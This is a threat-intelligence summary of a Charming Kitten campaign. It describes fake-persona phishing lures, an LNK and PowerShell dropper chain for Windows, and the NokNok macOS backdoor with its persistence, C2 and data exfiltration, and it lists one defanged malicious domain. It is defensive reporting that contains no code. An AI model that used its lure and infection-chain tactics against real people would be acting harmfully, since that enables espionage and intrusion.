Cyber Security Threat Summary:
“Security researchers observed a new campaign they attribute to the Charming Kitten APT group where hackers used new NokNok malware that targets macOS systems. The campaign started in May and relies on a different infection chain than previously observed, with LNK files deploying the payloads instead of the typical malicious Word documents seen in past attacks from the group” (Bleeping Computer, 2023).

Charming Kitten has been attributed to the Islamic Revolutionary Guard, and has launched various campaigns against foreign adversaries since at least 2015. In September 2022, the U.S. government managed to identify and charge members of the threat group.

In previous campaigns, the group was seen using macro-based infection methods, but has since switched to LNK files to upload their payloads. This trend follows many other cybercriminals, who look to circumvent new protections introduced by Microsoft. To lure victims, the group poses as nuclear experts from the U.S. and approaches targets with an offer to review a draft of foreign policy topics. In many cases, the attackers insert other personas in the conversation to add a sense of legitimacy and establish a rapport with the target. Charming Kitten’s impersonation or fake persona assumption in phishing attacks has been documented, and so has its use of ‘sock puppets’ to create realistic conversation threads.

Security Officer Comments:
Using the phishing messages to gain the victim’s trust, the threat actors send a malicious link that contains a Google script macro, which redirects the victim the an attacker controlled Dropbox URL. This external source hosts a password-protected RAR archive with a malware dropper that leverages PowerShell code and an LNK file to stage the malware from a cloud hosting provider. Eventually, through user interaction, the final payload GorjolEcho is dropped. This simple backdoor accepts and executes commands from the attackers. To avoid raising suspicion, GorjolEcho will open a PDF with a topic relevant to the discussion the attackers had with the target previously.

“If the victim uses macOS, which the hackers typically realize after they fail to infect them with the Windows payload, they send a new link to “library-store[.]camdvr[.]org” that hosts a ZIP file masquerading as a RUSI (Royal United Services Institute) VPN app” (Bleeping Computer, 2023). The Apple script will issue a curl command to fetch the NokNok payload to establish a backdoor on the victim’s system. NokNok generates a system identifier and then uses four bash script modules to set persistence, establish communication with the command and control (C2) server, and then starts exfiltrating data to it.

NokNok will also gather system information including OS version, processes running, and details on installed applications. NokNok will encrypt all collected data, encoding it in base64, then will exfiltrate it. The researchers from Proofpoint note that NokNok likely has additional modules that can carry out espionage-related functions.

NokNok shares some similarities with the GhostEcho backdoor, which has modules that allow it to take screenshots, execute commands, and remove artifacts. It is likely NokNok has similar functions. “Overall, this campaign shows that Charming Kitten has a high degree of adaptability, is capable of targeting macOS systems when necessary, and highlights the growing threat of sophisticated malware campaigns to macOS users” (Bleeping Computer, 2023).

Link(s):
https://www.proofpoint.com/us/blog/
https://www.bleepingcomputer.com/